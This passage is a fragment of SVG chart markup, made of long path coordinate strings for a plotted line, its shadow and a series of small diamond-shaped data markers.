100.17784926470588 235.71889157333374 L 101.70588235294119 235.71889157333374 L 103.23391544117648 235.71889157333374 L 104.76194852941177 235.71889157333374 L 106.28998161764706 235.71889157333374 L 107.81801470588236 235.71889157333374 L 109.34604779411765 235.71889157333374 L 110.87408088235294 235.71889157333374 L 112.40211397058825 235.71889157333374 L 113.93014705882354 235.71889157333374 L 115.45818014705883 235.71889157333374 L 116.98621323529413 235.71889157333374 L 118.51424632352942 235.71889157333374 L 120.04227941176471 235.71889157333374 L 121.5703125 235.71889157333374 L 123.0983455882353 235.71889157333374 L 124.6263786764706 235.71889157333374 L 126.15441176470588 235.71889157333374 L 127.68244485294119 235.71889157333374 L 129.21047794117646 235.71889157333374 L 130.73851102941177 235.71889157333374 L 132.26654411764707 235.71889157333374 L 133.79457720588235 235.71889157333374 L 135.32261029411765 235.71889157333374 L 136.85064338235296 235.71889157333374 L 138.37867647058823 235.71889157333374 L 139.90670955882354 235.71889157333374 L 141.43474264705884 235.71889157333374 L 142.96277573529412 235.71889157333374 L 144.49080882352942 235.71889157333374 L 146.01884191176472 235.71889157333374 L 147.546875 235.71889157333374 L 149.0749080882353 235.71889157333374 L 150.6029411764706 235.71889157333374 L 152.13097426470588 235.71889157333374 L 153.6590073529412 235.71889157333374 L 155.18704044117646 235.71889157333374 L 156.71507352941177 235.71889157333374 L 158.24310661764707 235.71889157333374 L 159.77113970588235 235.71889157333374 L 161.29917279411765 235.71889157333374 L 162.82720588235296 235.71889157333374 L 164.35523897058823 235.71889157333374 L 165.88327205882354 235.71889157333374 L 167.41130514705884 235.71889157333374 L 168.93933823529412 225.88482437333371 L 170.46737132352942 218.59612037333375 L 171.99540441176472 209.20516517333374 L 173.5234375 204.2245507733337 L 175.0514705882353 204.2245507733337 L 176.5795036764706 204.2245507733337 L 178.10753676470588 204.2245507733337 L 179.6355698529412 204.2245507733337 L 181.1636029411765 204.2245507733337 L 182.69163602941177 204.2245507733337 L 184.21966911764707 204.2245507733337 L 185.74770220588235 204.2245507733337 L 187.27573529411765 204.2245507733337 L 188.80376838235296 204.2245507733337 L 190.33180147058823 204.2245507733337 L 191.85983455882354 204.2245507733337 L 193.38786764705884 204.12039271466696 L 194.91590073529412 204.12039271466696 L 196.44393382352942 204.12039271466696 L 197.97196691176472 204.12039271466696 L 199.5 204.12039271466696 L 201.0280330882353 204.12039271466696 L 202.5560661764706 202.50390119466698 L 204.08409926470588 201.73298932266698 L 205.6121323529412 200.99941370666699 L 207.1401654411765 200.0549988693337 L 208.66819852941177 200.0549988693337 L 210.19623161764707 200.0549988693337 L 211.72426470588235 200.0549988693337 L 213.25229779411765 200.0549988693337 L 214.78033088235296 200.0549988693337 L 216.30836397058823 200.0549988693337 L 217.83639705882354 200.0549988693337 L 219.36443014705884 200.0549988693337 L 220.89246323529412 200.0549988693337 L 222.42049632352942 200.0549988693337 L 223.94852941176472 200.0549988693337 L 225.4765625 200.0549988693337 L 227.0045955882353 200.0549988693337 L 228.5326286764706 200.0549988693337 L 230.06066176470588 200.0549988693337 L 231.5886948529412 200.0549988693337 L 233.1167279411765 200.0549988693337 L 234.64476102941177 200.0549988693337 L 236.17279411764707 200.0549988693337 L 237.70082720588238 200.0549988693337 L 239.22886029411765 200.0549988693337 L 240.75689338235296 200.0549988693337 L 242.28492647058823 200.0549988693337 L 243.81295955882354 200.0549988693337 L 245.34099264705884 200.0549988693337 L 246.86902573529412 200.0549988693337 L 248.39705882352942 200.0549988693337 L 249.92509191176472 200.0549988693337 L 251.453125 200.0549988693337 L 252.9811580882353 200.0549988693337 L 254.5091911764706 200.0549988693337 L 256.0372242647059 200.0549988693337 L 257.56525735294116 200.0549988693337 L 259.09329044117646 200.0549988693337 L 260.62132352941177 200.0549988693337 L 262.1493566176471 200.0549988693337 L 263.6773897058824 200.0549988693337 L 265.2054227941177 200.0549988693337 L 266.7334558823529 200.0549988693337 L 268.26148897058823 200.0549988693337 L 269.78952205882354 200.0549988693337 L 271.31755514705884 200.0549988693337 L 272.84558823529414 200.0549988693337 L 274.37362132352945 200.0549988693337 L 275.9016544117647 200.0549988693337 L 277.4296875 200.04850936533373 L 278.9577205882353 200.04850936533373 L 280.4857536764706 200.04850936533373 L 282.0137867647059 200.04850936533373 L 283.54181985294116 200.04850936533373 L 285.06985294117646 200.04850936533373 L 286.59788602941177 200.04850936533373 L 288.1259191176471 200.04850936533373 L 289.6539522058824 200.04850936533373 L 291.1819852941177 200.04850936533373 L 292.7100183823529 200.04850936533373 L 294.23805147058823 200.04850936533373 L 295.76608455882354 200.04850936533373 L 297.29411764705884 200.04850936533373 L 298.82215073529414 200.04850936533373 L 300.35018382352945 200.04850936533373 L 301.8782169117647 200.04850936533373 L 303.40625 200.04850936533373 L 304.9342830882353 200.02203512533373 L 306.4623161764706 200.02203512533373 L 307.9903492647059 200.02203512533373 L 309.51838235294116 200.02203512533373 L 311.04641544117646 200.02203512533373 L 312.57444852941177 200.02203512533373 L 314.1024816176471 200.02203512533373 L 315.6305147058824 200.02203512533373 L 317.1585477941177 200.02203512533373 L 318.6865808823529 200.02203512533373 L 320.21461397058823 200.02203512533373 L 321.74264705882354 200.02203512533373 L 323.27068014705884 200.02203512533373 L 324.79871323529414 200.02203512533373 L 326.32674632352945 200.02203512533373 L 327.8547794117647 200.02203512533373 L 329.3828125 200.02203512533373 L 330.9108455882353 200.02203512533373 L 332.4388786764706 200.02203512533373 L 333.9669117647059 200.02203512533373 L 335.4949448529412 200.02203512533373 L 337.02297794117646 200.02203512533373 L 338.55101102941177 200.02203512533373 L 340.0790441176471 200.02203512533373 L 341.6070772058824 189.59691512533374 L 343.1351102941177 176.7312869653337 L 344.6631433823529 176.4515669653337 L 346.19117647058823 167.06533592533373 L 347.71920955882354 158.02734296533373 L 349.24724264705884 158.02734296533373 L 350.77527573529414 158.02734296533373 L 352.30330882352945 158.02734296533373 L 353.8313419117647 158.02734296533373 L 355.359375 158.00342379733374 L 356.8874080882353 158.00342379733374 L 358.4154411764706 158.00342379733374 L 359.9434742647059 158.00342379733374 L 361.4715073529412 158.00342379733374 L 362.99954044117646 158.00342379733374 L 364.52757352941177 158.00342379733374 L 366.0556066176471 158.00342379733374 L 367.5836397058824 158.00342379733374 L 369.1116727941177 157.93593579733374 L 370.6397058823529 157.93593579733374 L 372.16773897058823 154.4940477973337 L 373.69577205882354 146.7842186773337 L 375.22380514705884 143.32410891733372 L 376.75183823529414 143.32410891733372 L 378.27987132352945 143.32410891733372 L 379.8079044117647 143.32410891733372 L 381.3359375 143.32410891733372 L 382.8639705882353 143.32410891733372 L 384.3920036764706 143.32410891733372 L 385.9200367647059 143.32410891733372 L 387.4480698529412 143.32410891733372 L 388.97610294117646 143.32410891733372 L 390.50413602941177 142.3957660906671 L 392.0321691176471 138.82611659733573 L 393.5602022058824 138.82611659733573 L 395.0882352941177 138.82611659733573" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 235.71889157333374 L 94.06571691176471 235.71889157333374 L 95.59375 235.71889157333374 L 97.1217830882353 235.71889157333374 L 98.6498161764706 235.71889157333374 L 100.17784926470588 235.71889157333374 L 101.70588235294119 235.71889157333374 L 103.23391544117648 235.71889157333374 L 104.76194852941177 235.71889157333374 L 106.28998161764706 235.71889157333374 L 107.81801470588236 235.71889157333374 L 109.34604779411765 235.71889157333374 L 110.87408088235294 235.71889157333374 L 112.40211397058825 235.71889157333374 L 113.93014705882354 235.71889157333374 L 115.45818014705883 235.71889157333374 L 116.98621323529413 235.71889157333374 L 118.51424632352942 235.71889157333374 L 120.04227941176471 235.71889157333374 L 121.5703125 235.71889157333374 L 123.0983455882353 235.71889157333374 L 124.6263786764706 235.71889157333374 L 126.15441176470588 235.71889157333374 L 127.68244485294119 235.71889157333374 L 129.21047794117646 235.71889157333374 L 130.73851102941177 235.71889157333374 L 132.26654411764707 235.71889157333374 L 133.79457720588235 235.71889157333374 L 135.32261029411765 235.71889157333374 L 136.85064338235296 235.71889157333374 L 138.37867647058823 235.71889157333374 L 139.90670955882354 235.71889157333374 L 141.43474264705884 235.71889157333374 L 142.96277573529412 235.71889157333374 L 144.49080882352942 235.71889157333374 L 146.01884191176472 235.71889157333374 L 147.546875 235.71889157333374 L 149.0749080882353 235.71889157333374 L 150.6029411764706 235.71889157333374 L 152.13097426470588 235.71889157333374 L 153.6590073529412 235.71889157333374 L 155.18704044117646 235.71889157333374 L 156.71507352941177 235.71889157333374 L 158.24310661764707 235.71889157333374 L 159.77113970588235 235.71889157333374 L 161.29917279411765 235.71889157333374 L 162.82720588235296 235.71889157333374 L 164.35523897058823 235.71889157333374 L 165.88327205882354 235.71889157333374 L 167.41130514705884 235.71889157333374 L 168.93933823529412 225.88482437333371 L 170.46737132352942 218.59612037333375 L 171.99540441176472 209.20516517333374 L 173.5234375 204.2245507733337 L 175.0514705882353 204.2245507733337 L 176.5795036764706 204.2245507733337 L 178.10753676470588 204.2245507733337 L 179.6355698529412 204.2245507733337 L 181.1636029411765 204.2245507733337 L 182.69163602941177 204.2245507733337 L 184.21966911764707 204.2245507733337 L 185.74770220588235 204.2245507733337 L 187.27573529411765 204.2245507733337 L 188.80376838235296 204.2245507733337 L 190.33180147058823 204.2245507733337 L 191.85983455882354 204.2245507733337 L 193.38786764705884 204.12039271466696 L 194.91590073529412 204.12039271466696 L 196.44393382352942 204.12039271466696 L 197.97196691176472 204.12039271466696 L 199.5 204.12039271466696 L 201.0280330882353 204.12039271466696 L 202.5560661764706 202.50390119466698 L 204.08409926470588 201.73298932266698 L 205.6121323529412 200.99941370666699 L 207.1401654411765 200.0549988693337 L 208.66819852941177 200.0549988693337 L 210.19623161764707 200.0549988693337 L 211.72426470588235 200.0549988693337 L 213.25229779411765 200.0549988693337 L 214.78033088235296 200.0549988693337 L 216.30836397058823 200.0549988693337 L 217.83639705882354 200.0549988693337 L 219.36443014705884 200.0549988693337 L 220.89246323529412 200.0549988693337 L 222.42049632352942 200.0549988693337 L 223.94852941176472 200.0549988693337 L 225.4765625 200.0549988693337 L 227.0045955882353 200.0549988693337 L 228.5326286764706 200.0549988693337 L 230.06066176470588 200.0549988693337 L 231.5886948529412 200.0549988693337 L 233.1167279411765 200.0549988693337 L 234.64476102941177 200.0549988693337 L 236.17279411764707 200.0549988693337 L 237.70082720588238 200.0549988693337 L 239.22886029411765 200.0549988693337 L 240.75689338235296 200.0549988693337 L 242.28492647058823 200.0549988693337 L 243.81295955882354 200.0549988693337 L 245.34099264705884 200.0549988693337 L 246.86902573529412 200.0549988693337 L 248.39705882352942 200.0549988693337 L 249.92509191176472 200.0549988693337 L 251.453125 200.0549988693337 L 252.9811580882353 200.0549988693337 L 254.5091911764706 200.0549988693337 L 256.0372242647059 200.0549988693337 L 257.56525735294116 200.0549988693337 L 259.09329044117646 200.0549988693337 L 260.62132352941177 200.0549988693337 L 262.1493566176471 200.0549988693337 L 263.6773897058824 200.0549988693337 L 265.2054227941177 200.0549988693337 L 266.7334558823529 200.0549988693337 L 268.26148897058823 200.0549988693337 L 269.78952205882354 200.0549988693337 L 271.31755514705884 200.0549988693337 L 272.84558823529414 200.0549988693337 L 274.37362132352945 200.0549988693337 L 275.9016544117647 200.0549988693337 L 277.4296875 200.04850936533373 L 278.9577205882353 200.04850936533373 L 280.4857536764706 200.04850936533373 L 282.0137867647059 200.04850936533373 L 283.54181985294116 200.04850936533373 L 285.06985294117646 200.04850936533373 L 286.59788602941177 200.04850936533373 L 288.1259191176471 200.04850936533373 L 289.6539522058824 200.04850936533373 L 291.1819852941177 200.04850936533373 L 292.7100183823529 200.04850936533373 L 294.23805147058823 200.04850936533373 L 295.76608455882354 200.04850936533373 L 297.29411764705884 200.04850936533373 L 298.82215073529414 200.04850936533373 L 300.35018382352945 200.04850936533373 L 301.8782169117647 200.04850936533373 L 303.40625 200.04850936533373 L 304.9342830882353 200.02203512533373 L 306.4623161764706 200.02203512533373 L 307.9903492647059 200.02203512533373 L 309.51838235294116 200.02203512533373 L 311.04641544117646 200.02203512533373 L 312.57444852941177 200.02203512533373 L 314.1024816176471 200.02203512533373 L 315.6305147058824 200.02203512533373 L 317.1585477941177 200.02203512533373 L 318.6865808823529 200.02203512533373 L 320.21461397058823 200.02203512533373 L 321.74264705882354 200.02203512533373 L 323.27068014705884 200.02203512533373 L 324.79871323529414 200.02203512533373 L 326.32674632352945 200.02203512533373 L 327.8547794117647 200.02203512533373 L 329.3828125 200.02203512533373 L 330.9108455882353 200.02203512533373 L 332.4388786764706 200.02203512533373 L 333.9669117647059 200.02203512533373 L 335.4949448529412 200.02203512533373 L 337.02297794117646 200.02203512533373 L 338.55101102941177 200.02203512533373 L 340.0790441176471 200.02203512533373 L 341.6070772058824 189.59691512533374 L 343.1351102941177 176.7312869653337 L 344.6631433823529 176.4515669653337 L 346.19117647058823 167.06533592533373 L 347.71920955882354 158.02734296533373 L 349.24724264705884 158.02734296533373 L 350.77527573529414 158.02734296533373 L 352.30330882352945 158.02734296533373 L 353.8313419117647 158.02734296533373 L 355.359375 158.00342379733374 L 356.8874080882353 158.00342379733374 L 358.4154411764706 158.00342379733374 L 359.9434742647059 158.00342379733374 L 361.4715073529412 158.00342379733374 L 362.99954044117646 158.00342379733374 L 364.52757352941177 158.00342379733374 L 366.0556066176471 158.00342379733374 L 367.5836397058824 158.00342379733374 L 369.1116727941177 157.93593579733374 L 370.6397058823529 157.93593579733374 L 372.16773897058823 154.4940477973337 L 373.69577205882354 146.7842186773337 L 375.22380514705884 143.32410891733372 L 376.75183823529414 143.32410891733372 L 378.27987132352945 143.32410891733372 L 379.8079044117647 143.32410891733372 L 381.3359375 143.32410891733372 L 382.8639705882353 143.32410891733372 L 384.3920036764706 143.32410891733372 L 385.9200367647059 143.32410891733372 L 387.4480698529412 143.32410891733372 L 388.97610294117646 143.32410891733372 L 390.50413602941177 142.3957660906671 L 392.0321691176471 138.82611659733573 L 393.5602022058824 138.82611659733573 L 395.0882352941177 138.82611659733573" fill="none" stroke="#eeaaee" stroke-width="2"></path><path d="M 395 135 L 399 139 395 143 391 139 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 393.5 135 L 397.5 139 393.5 143 389.5 139 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 392 135 L 396 139 392 143 388 139 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 390.5 138.5 L 394.5 142.5 390.5 146.5 386.5 142.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 389 139.5 L 393 143.5 389 147.5 385 143.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 387.5 139.5 L 391.5 143.5 387.5 147.5 383.5 143.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 386 139.5 L 390 143.5 386 147.5 382 143.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 384.5 139.5 L 388.5 143.5 384.5 147.5 380.5 143.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 383 139.5 L 387 143.5 383 147.5 379 143.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 381.5 139.5 L 385.5 143.5 381.5 147.5 377.5 143.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 380 139.5 L 384 143.5 380 147.5 376 143.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 378.5 139.5 L 382.5 143.5 378.5 147.5 374.5 143.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 377 139.5 L 381 143.5 377 147.5 373 143.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 375 139.5 L 379 143.5 375 147.5 371 143.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 373.5 143 L 377.5 147 373.5 151 369.5 147 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 372 150.5 L 376 154.5 372 158.5 368 154.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 370.5 154 L 374.5 158 370.5 162 366.5 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 369 154 L 373 158 369 162 365 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 367.5 154 L 371.5 158 367.5 162 363.5 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 366 154 L 370 158 366 162 362 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 364.5 154 L 368.5 158 364.5 162 360.5 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 363 154 L 367 158 363 162 359 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 361.5 154 L 365.5 158 361.5 162 357.5 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 360 154 L 364 158 360 162 356 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 358.5 154 L 362.5 158 358.5 162 354.5 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 357 154 L 361 158 357 162 353 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 355.5 154 L 359.5 158 355.5 162 351.5 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 354 154 L 358 158 354 162 350 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 352.5 154 L 356.5 158 352.5 162 348.5 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 351 154 L 355 158 351 162 347 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 349 154 L 353 158 349 162 345 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 347.5 154 L 351.5 158 347.5 162 343.5 158 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 346 163 L 350 167 346 171 342 167 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 344.5 172.5 L 348.5 176.5 344.5 180.5 340.5 176.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 343 172.5 L 347 176.5 343 180.5 339 176.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 341.5 185.5 L 345.5 189.5 341.5 193.5 337.5 189.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 340 196 L 344 200 340 204 336 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 338.5 196 L 342.5 200 338.5 204 334.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 337 196 L 341 200 337 204 333 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 335.5 196 L 339.5 200 335.5 204 331.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 334 196 L 338 200 334 204 330 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 332.5 196 L 336.5 200 332.5 204 328.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 331 196 L 335 200 331 204 327 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 329.5 196 L 333.5 200 329.5 204 325.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 328 196 L 332 200 328 204 324 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 326.5 196 L 330.5 200 326.5 204 322.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 325 196 L 329 200 325 204 321 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 323.5 196 L 327.5 200 323.5 204 319.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 321.5 196 L 325.5 200 321.5 204 317.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 320 196 L 324 200 320 204 316 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 318.5 196 L 322.5 200 318.5 204 314.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 317 196 L 321 200 317 204 313 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 315.5 196 L 319.5 200 315.5 204 311.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 314 196 L 318 200 314 204 310 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 312.5 196 L 316.5 200 312.5 204 308.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 311 196 L 315 200 311 204 307 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 309.5 196 L 313.5 200 309.5 204 305.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 308 196 L 312 200 308 204 304 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 306.5 196 L 310.5 200 306.5 204 302.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 305 196 L 309 200 305 204 301 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 303.5 196 L 307.5 200 303.5 204 299.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 302 196 L 306 200 302 204 298 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 300.5 196 L 304.5 200 300.5 204 296.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 299 196 L 303 200 299 204 295 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 297.5 196 L 301.5 200 297.5 204 293.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 296 196 L 300 200 296 204 292 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 294 196 L 298 200 294 204 290 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 292.5 196 L 296.5 200 292.5 204 288.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 291 196 L 295 200 291 204 287 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 289.5 196 L 293.5 200 289.5 204 285.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 288 196 L 292 200 288 204 284 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 286.5 196 L 290.5 200 286.5 204 282.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 285 196 L 289 200 285 204 281 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 283.5 196 L 287.5 200 283.5 204 279.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 282 196 L 286 200 282 204 278 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 280.5 196 L 284.5 200 280.5 204 276.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 279 196 L 283 200 279 204 275 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 277.5 196 L 281.5 200 277.5 204 273.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 276 196 L 280 200 276 204 272 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 274.5 196 L 278.5 200 274.5 204 270.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 273 196 L 277 200 273 204 269 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 271.5 196 L 275.5 200 271.5 204 267.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 270 196 L 274 200 270 204 266 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 268.5 196 L 272.5 200 268.5 204 264.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 266.5 196 L 270.5 200 266.5 204 262.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 265 196 L 269 200 265 204 261 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 263.5 196 L 267.5 200 263.5 204 259.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 262 196 L 266 200 262 204 258 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 260.5 196 L 264.5 200 260.5 204 256.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 259 196 L 263 200 259 204 255 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 257.5 196 L 261.5 200 257.5 204 253.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 256 196 L 260 200 256 204 252 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 254.5 196 L 258.5 200 254.5 204 250.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 253 196 L 257 200 253 204 249 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 251.5 196 L 255.5 200 251.5 204 247.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 250 196 L 254 200 250 204 246 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 248.5 196 L 252.5 200 248.5 204 244.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 247 196 L 251 200 247 204 243 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 245.5 196 L 249.5 200 245.5 204 241.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 244 196 L 248 200 244 204 240 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 242.5 196 L 246.5 200 242.5 204 238.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 241 196 L 245 200 241 204 237 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 239 196 L 243 200 239 204 235 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 237.5 196 L 241.5 200 237.5 204 233.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 236 196 L 240 200 236 204 232 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 234.5 196 L 238.5 200 234.5 204 230.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 233 196 L 237 200 233 204 229 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 231.5 196 L 235.5 200 231.5 204 227.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 230 196 L 234 200 230 204 226 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 228.5 196 L 232.5 200 228.5 204 224.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 227 196 L 231 200 227 204 223 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 225.5 196 L 229.5 200 225.5 204 221.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 224 196 L 228 200 224 204 220 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 222.5 196 L 226.5 200 222.5 204 218.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 221 196 L 225 200 221 